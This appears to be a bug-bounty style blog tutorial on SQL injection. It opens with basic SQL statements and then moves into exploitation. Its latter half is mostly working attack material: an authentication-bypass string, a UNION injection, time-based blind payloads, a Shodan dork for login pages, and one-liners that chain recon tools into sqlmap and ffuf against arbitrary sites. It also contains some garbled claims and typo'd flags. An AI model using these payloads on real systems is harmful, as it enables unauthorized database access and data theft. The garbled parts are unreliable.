SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there.
It is one of the most widespread and dangerous vulnerabilities on the Internet.
It is a malicious code that can be used to bypass operating systems' security features.
This functionality allows attackers maximum freedom in creating and manipulating the rest of the website's structure and content, allowing them to gain complete control over it.
The bad thing about SQL Injection is that it's difficult to detect and stop at the time of its exploitation.
The discovery of a SQL Injection vulnerability can be horrifying because it allows an attacker to directly access and potentially compromise the underlying data on your site.
In this article, I'll show you what SQL injection is and how to locate it.
What is SQL injection?
This attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application.
It allows an attacker to view data that they are not normally able to retrieve.
This might include data belonging to other users, or any other data that the application itself is able to access.
In many cases, attackers can modify or delete this data, causing persistent changes to the application's content or behaviour.
Basic SQL Statements
Select Command - It is an introductory statement as it will be used while interacting with other commands. It is the basic statement in SQL. You will use select when you want to select something from the database Example- SELECT * FROM table; here, Select * means you want to select all the data in the table. and, From here means where you want to select the data in this case it is a table. This means you want to select from table(name of the table). Example 2- SELECT age, name FROM Class_details; here, you will get all the data from the columns of age and name and from table class details
Where Command- It is the same as it sounds. It is also a basic statement in SQL. Example- SELECT name, age FROM Class_details WHERE age < 10 Now from this command, you will get the data from the columns' name and age. But only those data will be retrieved whose age is less than 10 years.
Order Command- It is used to sort the results in ascending or descending order. For assending use ASC and for descending use DESC Example- SELECT name, age From Class_details ORDER BY age; if you want it in ascending you can write ASC after age and for descending write DESC after age. here it will start from least age if you use ASC and Max age if you use DESC
Union Command- It is used to join rows together. SELECT age, name FROM Class1_details UNION SELECT age, name FROM Class2_details; Here it will combine the two rows or you can use UNION ALL to return all data.
How to test for SQL Injection
Example 1:
Lets take a query SELECT * FROM Table WHERE id='1';
Here what the query want to say is it want to select al the data from the table from the id 1
So lets now understand what we want to do to test for SQL Injection.
if we use ' it will be false and if we use '' it will be true
if we use " it will be false and if we use "" it will be true
if we use \ it will be false and if we use \\ it will be true
I know you are a bit confuse about true or false but you will get it now.
So as testing for a website we will be seeing only the id maybe or anything else you know about that so what we will use is
Let's say the URL is like
www.website.com?id=1
and for that the query will be SELECT * FROM Table WHERE id='1';
so we will to test for that is
www.website.com?id=1'
or
www.website.com?id=1"
or
www.website.com?id=1\
so these will be like
SELECT * FROM Table WHERE id='1'';
SELECT * FROM Table WHERE id='1'";
SELECT * FROM Table WHERE id='1'\;
And you know you have to complete the query to use another sql statement
SELECT * FROM Table WHERE id='1''';
or you can use is
SELECT * FROM Table WHERE id='1''''''''''''UNION SELECT '2';
it may return the data from id 2
Example 2:
Now lets assume there is a login portal and you don't know the password of that or also its username so what we will do here is:
Let's see its query
SELECT * FROM Users WHERE username = 'correct_username' AND password = 'correct_password';
But what we as a hacker will do is
we will comment out the password part
if you know programming then you must know that where we will use a comment it will not be read while compiling so we will do the same to fool the database.
we will use is
SELECT * FROM Users WHERE username = '' OR 1=1#' AND password = '';
Here everything after # is commented out and will not ready while reading the query.
So we will insect this query in a website like this
assuming we are having a login portal which require username and password
Username :
Password:
What we will use here is
Username : anything' OR 1=1#'
Password : anything
So the above query will run here and we will be able to bypass the login portal
Other Comment queries are
# --------------------------- Hash Comment
/* --------------------------- C-style Comment
-- - --------------------------- SQL Comment
;%00 --------------------------- Nullbyte
` --------------------------- Backtick
Some Tips for finding SQL injection
Using SQL map sqlmap -u "http://website.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10 Injection marker: * by injecting header
Time based sqli '%2b(select*from(select(sleep(20)))a)%2b'
Using Shodan use the dork org:"TARGET" http.title:"login" and bypass using admin' or 1=1
Another one using SQL map findomain -t http://website.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1
Using Header X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'
Another oneliner subfinder -d website.com -silent -all | gau --blacklist ttt ,woff ,svg ,png | sort -u | gf sqli > sqli.txt; sqlmap -m sqli.txt -batch -risk 3 -ransom-agernt | tee -a sqli_report.txt
Another payload 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Other payloads > +OR+1=insert(1,1,1,1)-- > +OR+1=replace(1,1,1)-- > {`foo`/*bar*/(select+1)\}' > {`foo`/*bar*/(select%2b2)} >{`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}
Use Logsensor for discovering login panels and post form sqli Link
Script i use: #!/bin/bash for i in $(cat Sql\ injection/BlindSQLi.fuzzdb_seclists.txt) ; do cat $1 | grep “=” | qsreplace “$i” >> sqli ffuf -u FUZZ -w sqli -s -ft “<5000” | tee -a sql_script_results/vulnSqli.txt rm sqli ; done
So that is it for today guys
I hope you all like the blog if so comment down below and if you find any vuln please let me know I will be much happy to hear about that and if you want to see other blogs like this comment down.
For writing your own blog here. You can contact me
We will meet in another blog
Till then
Take care and Happy Hacking
Comments